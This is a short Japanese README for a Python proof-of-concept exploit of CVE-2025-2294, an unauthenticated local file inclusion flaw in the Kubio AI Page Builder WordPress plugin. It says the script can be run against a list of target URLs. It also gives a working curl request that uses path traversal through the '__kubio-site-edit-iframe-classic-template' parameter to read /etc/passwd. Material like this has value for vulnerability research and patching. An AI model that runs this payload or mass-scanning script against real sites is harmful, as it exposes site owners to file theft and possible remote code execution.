
# CVE-2025-2294 用 Python PoC Kubio AI Page Builder WordPress プラグイン(≤2.5.1)における未認証のローカルファイルインクルード(Local File Inclusion)の Python PoC。任意のファイル開示と潜在的なリモートコード実行を実証します。
CVE-2025-2294 は、WordPress用Kubio AI Page Builderプラグイン(バージョン2.5.1まで)に影響を与える深刻な🔥ローカルファイルインクルージョン(LFI)脆弱性です。この欠陥により、認証されていないリモートの攻撃者👾が、__kubio-site-edit-iframe-classic-template URLパラメータを介してサーバー上の任意のファイルを含めることができます。
この脆弱性を悪用すると、機密ファイルの漏洩📂、リモートコード実行💥、システム全体の侵害💀につながる可能性があります。
Muhammad Nizar — セキュリティ研究者🔐
GitHub: 0xWhoami35
YouTube: InfoSec Insight ▶️
ご質問やコラボレーションについてはお気軽にお問い合わせください!🤝
ターゲットURLのリストを指定してエクスプロイトスクリプトを実行します:
python3 lfi.py -l list.txt
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"